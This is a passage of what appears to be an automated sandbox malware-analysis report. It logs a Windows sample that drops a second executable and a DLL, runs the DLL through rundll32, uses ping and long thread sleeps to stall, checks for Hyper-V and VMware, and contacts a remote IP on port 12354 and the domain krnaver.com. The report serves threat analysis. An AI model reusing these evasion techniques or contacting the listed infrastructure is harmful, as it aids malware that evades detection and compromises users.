Source: unknownNetwork traffic detected: HTTP traffic on port 56239 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56241 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58669 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58756 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60811 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60813 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62747 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62754 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64340 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64411 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51781 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53250 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53449 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54167 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54268 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56076 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56250 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57568 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57657 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60035 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60195 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61976 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62080 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64142 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64288 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65421 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65491 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52585 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52771 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54999 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55132 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56775 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58580 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58639 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60181 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62705 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62711 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63434 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63529 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64828 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64971 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52000 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53660 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53773 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55792 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55930 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57469 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57499 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58773 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58794 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59420 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59536 -> 12354
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_00402138 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,0_2_00402138
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_00402138 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,5_2_00402138
Source: C:\Users\user\Desktop\XgijTrY6No.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\XgijTrY6No.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\XgijTrY6No.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-5800
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 878Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 6157Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-6262
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-1054
Source: C:\Users\user\Desktop\XgijTrY6No.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-1055
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeDropped PE file which has not been started: C:\ftelcs\rjqzr.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-6015
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612Thread sleep count: 878 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612Thread sleep time: -8780000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7724Thread sleep count: 74 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7712Thread sleep time: -1200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7708Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7560Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep count: 125 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep time: -37500000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7920Thread sleep time: -1260000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7908Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep time: -7200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep count: 6157 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep time: -1847100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7560Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,WinExec,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,WinExec,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,6_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_100052A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100060E0 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,6_2_100060E0
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
Source: rundll32.exe, 00000006.00000003.1572438175.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3515855541.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2262348463.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3597257344.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2422989775.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3758155005.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2222059550.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.3802838449.00000000008AB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHox
Source: XgijTrY6No.exe, 00000000.00000002.1349290968.000000000057E000.00000004.00000020.00020000.00000000.sdmp, mszcy.exe, 00000005.00000002.1358415143.000000000081E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XgijTrY6No.exeAPI call chain: ExitProcess graph end nodegraph_0-726
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeAPI call chain: ExitProcess graph end nodegraph_5-765
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-5805
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_8-344
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_0040229F _EH_prolog,EnterCriticalSection,#540,SendMessageA,#3998,#6907,#6907,#2818,#6907,GetSystemTime,#2818,LdrInitializeThunk,#6907,LdrInitializeThunk,#6007,#823,#823,memcpy,LdrInitializeThunk,#6007,LeaveCriticalSection,#800,5_2_0040229F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,6_2_100051B0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.108.0.52 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: krnaver.com
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.204 12354Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\mszcy.exe C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
